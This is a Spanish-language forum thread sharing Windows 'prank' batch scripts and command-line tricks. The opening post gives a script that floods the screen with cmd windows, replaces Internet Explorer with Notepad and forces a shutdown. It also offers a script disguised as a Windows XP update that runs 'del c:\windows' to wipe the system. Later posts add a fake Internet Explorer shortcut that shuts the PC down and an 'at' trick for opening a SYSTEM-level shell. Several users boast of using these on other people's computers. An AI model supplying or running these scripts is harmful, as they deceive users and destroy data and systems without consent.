Win7 Broma para Windows

Todas las versiones, productos y servicios de Windows 7.
Si quieres hacer una pequeña broma prueba esto:

================================================================================

@echo off
msg * Hola soy MoCKeR perdona esta LOL
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
copy c:\windows\notepad.exe c:\progra~1\intern~1\
ren c:\progra~1\intern~1\iexplore.exe KB049741.exe
ren c:\progra~1\intern~1\notepad.exe iexplore.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
shutdown -s -t 90 -c "Despitedete de tu equipo...XD" -f

================================================================================

Se abrirán unas cuantas ventanillas de cmd, pero en medio de esto se cambiara el nombre de internet explorer y no lo podras abrir.

Antidoto:

================================================================================

title Para arreglar esa vaina de internet
del c:\progra~1\intern~1\iexplore.exe
ren c:\progra~1\intern~1\KB049741.exe iexplore.exe
 
Broma pesada======> borrar windows

========================================================================

@echo off
title Actualizacion Windows XP
msg * Actualizacion Windows XP por favor espere.........
del c:\windows
 
Desde Redmond con humor:

Bluescreen es un salvapantallas que imita la famosa pantalla azul de la muerte (indicativa de un fallo grave en Windows).
Para mayor verosimilitud, muestra información real sobre drivers, direcciones de memoria, información de procesador, disco y sistema operativo, etc., tomada del mismo sistema donde se ejecuta...
Pero no se limita sólo a eso, sino que cada 15 segundos simula el reinicio de la máquina.
Microsoft lo recomienda para "divertir a tus amigos y asustar a tus enemigos"...
http://www.microsoft.com/technet/sysinternals/Miscellaneous/BlueScreen.mspx

Informacion tomada de Kriptopolis
 
  • Me gusta
Reacciones: 4 personas
UAC-Guille dijo:
Desde Redmond con humor:

Bluescreen es un salvapantallas que imita la famosa pantalla azul de la muerte (indicativa de un fallo grave en Windows).
Para mayor verosimilitud, muestra información real sobre drivers, direcciones de memoria, información de procesador, disco y sistema operativo, etc., tomada del mismo sistema donde se ejecuta...
Pero no se limita sólo a eso, sino que cada 15 segundos simula el reinicio de la máquina.
Microsoft lo recomienda para "divertir a tus amigos y asustar a tus enemigos"...
http://www.microsoft.com/technet/sysinternals/Miscellaneous/BlueScreen.mspx

Informacion tomada de Kriptopolis
huy si esta esta mundial!!!
k alucinantada k se van a pegar en la fabrica cuando vean eso!!!>D >D >D
 
Chau. Me voy a lo de un amigo... a hacer bromas jajajejejijijojojuju.
Antes mi hermano se conocia uno que te abria la Papelera de reciclaje con todos los archivos del PC dentro y "simulaba" que los eliminaba. Claro que despues todo andaba normal, pero el susto no te lo sacaba nadie jajaja.

Muy buenos aportes. Espero que sigan mandando bromas.

Salu2!!!
 
(-Alej´´ dijo:
Chau. Me voy a lo de un amigo... a hacer bromas jajajejejijijojojuju.
Antes mi hermano se conocia uno que te abria la Papelera de reciclaje con todos los archivos del PC dentro y "simulaba" que los eliminaba. Claro que despues todo andaba normal, pero el susto no te lo sacaba nadie jajaja.

Muy buenos aportes. Espero que sigan mandando bromas.

Salu2!!!

hey panas como andan, alej, sabes como se hace eso de la papelera?? me llamo bastante la atencion
 
Turok808 dijo:
Hola, pues hace un tiempo aprendi en video de youtube a hacer un virus falso, mas bien es como una broma, consiste en que una persona le da doble clic al acceso directo de Internet Explorer y aparece un mensaje que te pide que gurdes todo por que la PC se va a apagar en X tiempo y esto no se puede detener. Bueno pues se hace asi:
1. en el escrtorio ha clic al boton derecho del raton y dale en "Nuevo", luego en "Acceso directo"
2. en la ventana de Crear acceso directo, teclea: shutdown -s -t x -c "y"
x=tiempo en segundos
y=cometario entre comillas
3. clic en "Siguiente", y luego teclea Internet Explorer en Escriba un nom,bre para este acceso directo, clic en "Finalizar"
4. Dale clic con el boton derecho de raton y clic en "Propiedades", clic en "Cambiar icono" busca el icocno de Internet Explorer, clic en Aceptar

Buenisima la broma, jejejej

la probare :)
 
Deberia preguntare a mi hermano como era. Lastima que esta de viaje y sin celular (Noooo omeee. Si no pierde la cabeza porque la tiene pegada al cuerpo jajajaja). Igual creo que era solo para Windows 98.

Salu2 de todas formas!!!

PD: Probe la broma de Turok808 en un cyber y salio perfecto. Menudo garron que se comio el del cyber. Que c... de risa.
 
Es cierto ome cuente, cuente cual es ese script que yo tengo MSN Plus! (Todavia tengo Windows. Siamo fore)

Salu2!!!
 
hay una broma que hace uso de la unidad de cd rom...

la abre, la cierra, y lo repite varias veces ... alguien la tiene?
 
No tiene que estar en un dominio.. .si las máquinas tienen exactamente el mismo usuario y contraseña para un usuario administrador, lo pueden hacer... Aquí van otros trucos más de este tipo:

Si desean una lista de los archivos que tienen en una carpeta, lleguen a ella por línea de comando y ejecuten

dir /b>lista.txt

Eso creará un archivo de texto donde aparece sólo el listado de los archivos... útil para cambiar música y otras cosas.

Hacer que un comando corra a una hora específica

at [día de la semana] [hora de ejecución] [comando]

si necesitan más información sobre como ejecutarlo, pueden hacer at /?

Si tienen un proceso bajo el usuario system, y no lo pueden cerrar (porque les da acceso denegado) pueden hacer esto:

at (hora del próximo minuto) /i cmd.exe

eso les abre una línea de comando que pertenece al usuario system, y como ya lo saben, system tiene aún más privilegios que un administrador. Eso sí, tengan cuidado, porque se pueden tirar el sistema fácilmente porque tienen "demasiados permisos"

copiar una carpeta con todo su contenido, manteniendo exactamente los permisos y atributos de los usuarios, y copiando archivos ocultos y de sistema:

xcopy /h /o /r /s /e /y [origen] [destino]

Si quieren saber más cosas para hacerlas por línea de comando, sólo pregúntenme, que tengo muchos más tips, pero no se me ocurren en este momento.
 
Ah, y hablando de bromas... se me olvidaba decirles, pueden ir a sysinternals.com, y bajar un protector de pantalla que parece una pantalla azul de windows (BSOD), lo bonito, es que reconoce la versión del sistema operativo, y hace que se vea real... muy graciosa.
 
jaja! las bromas estan buenas... se las hice a un amigo que administra un cyber y por poco lo mando al hospital xD :D
 

Los últimos temas